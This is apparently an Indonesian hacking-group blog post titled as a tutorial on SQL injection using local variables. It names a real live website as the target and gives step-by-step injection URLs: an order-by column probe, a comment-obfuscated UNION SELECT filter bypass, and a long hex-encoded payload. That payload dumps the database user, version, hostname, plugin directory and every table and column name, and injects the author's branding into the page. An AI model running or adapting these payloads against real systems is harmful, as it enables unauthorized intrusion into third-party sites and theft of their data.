Tutorial Sql local varielabel

 Assalamualaikum


Disini gua Noub93 Gans akan mengtutor:v Sql Poc local variabel

Pertama" seperti biasa

Siapin alat" nya 

-> dios


Live target : http://www.ampak.com.tw/product.php?id=21


Oke lanjut seperti biasa

Kita cek vuln atau tidak terlebih dahulu ,cara nya tambahin '


Nah itu Vuln,oke lanjut kita order+by--+-

Caranya

http://www.ampak.com.tw/product.php?id=21+order+by+1--+-

Kalian naikin terus angka nya sampe nemu yang error

Nah disini gua nemu yang error di angka 9

http://www.ampak.com.tw/product.php?id=21+order+by+9--+-


Nah berarti angka ajaib/togel nya di no 8 !!!

Cara manggil nya ?

Kalian ganti order+by jadi union+select

Karna itu harus pake bypas jadi gua gunain yang

AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+

Contoh : http://www.ampak.com.tw/product.php?id=21+AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+1,2,3,4,5,6,7,8--+-

Nah angka togel nya muncul (3)



Oke lanjut..... Cara variabel nya ?

Kita tambahin and mod (9,9) div@nicklu:=dioslu 

Ini lu tambahin habis angka parameter

Terus angka togel nya lu ganti jadi @nicklu 

Contoh : http://www.ampak.com.tw/product.php?id=21+and%20mod%20(9,9)%20div@Noub93:=CoNcAt/**8***/(0x3c63656e7465723e272c273c696d67207372633d2268747470733a2f2f692e6962622e636f2f637666376643732f32303230303630372d3232343531352e706e6722206865696768743d223330307078222077696474683d22333030707822272c273c2f63656e7465723e272c273c2f62723e272c273c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e4e6f756239332047616e733c2f666f6e743e3c2f62723e3c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e4e65787573204379626572205465616d3c2f666f6e743e3c62723e,0x555345523a3e,current_user,0x3c62723e,0x56455253494f4e3a3e,version(),0x3c62723e,%200x504c5547494e3a3e,@@plugin_dir,%200x3c62723e,%200x53594d4c494e4b3a3e,@@GLOBAL.have_symlink,%200x3c62723e,%200x484f53544e414d453a3e,@@hostname,%200x3c62723e,0x3c666f6e7420636f6c6f723d22626c7565223e,(select(@x)/*!50000From*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000Information_schema.columns*/)/*!50000Where*/(table_schema=database/*data*//**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x))+/*!50000UNION/****/*/+/*!50000SELECT/****/*/+1,2,@Noub93,4,5,6,7,8--+-



Hasil :



Jadi gitu tutor sql local variabel


Sekian Terimakasi:) Wassalamu'alaikum


#Nexus Cyber Team


Tidak ada komentar:

Posting Komentar